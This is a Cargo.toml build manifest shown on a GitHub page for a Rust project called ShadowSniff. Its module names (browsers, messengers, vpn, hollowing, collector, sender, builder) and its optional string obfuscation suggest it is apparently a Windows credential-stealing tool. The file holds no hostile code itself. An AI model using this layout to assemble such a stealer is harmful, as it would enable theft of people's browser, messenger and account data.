-
Notifications
You must be signed in to change notification settings - Fork 17
Expand file tree
/
Copy pathCargo.toml
More file actions
87 lines (81 loc) · 1.94 KB
/
Cargo.toml
File metadata and controls
87 lines (81 loc) · 1.94 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
[package]
name = "ShadowSniff"
version = "2.2.0"
edition = "2024"
license-file = "LICENSE"
[features]
builder_build = ["obfstr"]
message_box_before_execution = []
message_box_after_execution = []
[workspace]
resolver = "3"
members = [
"database",
"ipinfo",
"json",
"requests",
"shadowsniff",
"shadowsniff/browsers",
"shadowsniff/ftp",
"shadowsniff/messengers",
"shadowsniff/games",
"shadowsniff/vpn",
"tasks",
"hollowing",
"utils",
"collector",
"zip",
"filesystem",
"regedit",
"sender",
"builder"
]
[workspace.dependencies]
windows-sys = { version = "0.61.0", features = [
"Win32_Foundation",
"Win32_System_Console",
"Win32_Storage_FileSystem",
"Win32_System_Environment",
"Win32_System_IO",
"Win32_Security",
"Win32_System_Com",
"Win32_UI_Shell",
"Win32_System_Threading",
"Win32_Security_Cryptography",
"Win32_System_Pipes",
"Win32_System_SystemInformation",
"Win32_System_Performance",
"Win32_System_ProcessStatus",
"Win32_System_LibraryLoader",
"Win32_System_Diagnostics_Debug",
"Win32_System_Kernel",
"Win32_System_SystemServices",
"Win32_System_WindowsProgramming",
"Win32_Graphics_Gdi",
"Win32_UI_WindowsAndMessaging",
"Win32_System_DataExchange",
"Win32_System_Registry",
"Win32_System_Memory"
] }
[profile.release]
strip = true
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
[profile.dev]
panic = "abort"
[dependencies]
windows-sys = { workspace = true }
shadowsniff = { path = "shadowsniff" }
tasks = { path = "tasks" }
utils = { path = "utils" }
ipinfo = { path = "ipinfo" }
collector = { path = "collector" }
zip = { path = "zip" }
filesystem = { path = "filesystem" }
sender = { path = "sender" }
rand_chacha = { version = "0.9.0", default-features = false }
rand_core = { version = "0.9.3", default-features = false }
cfg-if = "1.0.1"
obfstr = { version = "0.4.4", optional = true }